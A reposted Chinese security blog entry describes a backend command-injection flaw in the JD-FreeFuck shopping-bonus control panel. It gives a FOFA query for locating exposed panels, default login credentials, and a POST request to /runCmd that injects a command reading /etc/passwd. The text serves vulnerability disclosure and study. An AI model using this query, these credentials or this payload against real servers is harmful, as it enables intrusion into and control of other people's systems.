当前位置:网站首页>JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
2022-04-23 18:04:00 【孤桜懶契】
漏洞描述
i
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck
漏洞影响
s
JD-FreeFuck
空间测绘
d
FOFA:title="京东薅羊毛控制面板"
漏洞复现
- 访问后登录页面如下
- 默认账号
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
个人博客
孤桜懶契:https://gylq.gitee.io/time
版权声明
本文为[孤桜懶契]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_35938621/article/details/124356729
边栏推荐
- re正则表达式
- C language implements memcpy, memset, strcpy, strncpy, StrCmp, strncmp and strlen
- I / O multiplexing and its related details
- 2022 judgment questions and answers for operation of refrigeration and air conditioning equipment
- cartographer_ There is no problem compiling node, but running the bug that hangs directly
- Re expression régulière
- Tensorflow tensor introduction
- .105Location
- Theory and practice of laser slam in dark blue College - Chapter 2 (odometer calibration)
- Mode of interprocess communication
猜你喜欢
Scikit learn sklearn 0.18 official document Chinese version
Go的Gin框架学习
C#的随机数生成
Anchor location - how to set the distance between the anchor and the top of the page. The anchor is located and offset from the top
Clion installation tutorial
Visualization of residential house prices
Process management command
Auto. JS custom dialog box
Jenkspy package installation
Logic regression principle and code implementation
随机推荐
MySQL auto start settings start with systemctl start mysqld
String function in MySQL
From source code to executable file
Laser slam theory and practice of dark blue College Chapter 3 laser radar distortion removal exercise
Crawler for querying nicknames and avatars based on qqwebapi
C#字节数组(byte[])和字符串相互转换
ROS package NMEA_ navsat_ Driver reads GPS and Beidou Positioning Information Notes
C language implements memcpy, memset, strcpy, strncpy, StrCmp, strncmp and strlen
Classes and objects
Format problems encountered in word typesetting
Re expression régulière
Stanford machine learning course summary
Secure credit
Jenkspy package installation
Operation of 2022 mobile crane driver national question bank simulation examination platform
I / O multiplexing and its related details
Climbing watermelon video URL
纳米技术+AI赋能蛋白质组学|珞米生命科技完成近千万美元融资
C language input and output (printf and scanf functions, putchar and getchar functions)
7-21 wrong questions involve knowledge points.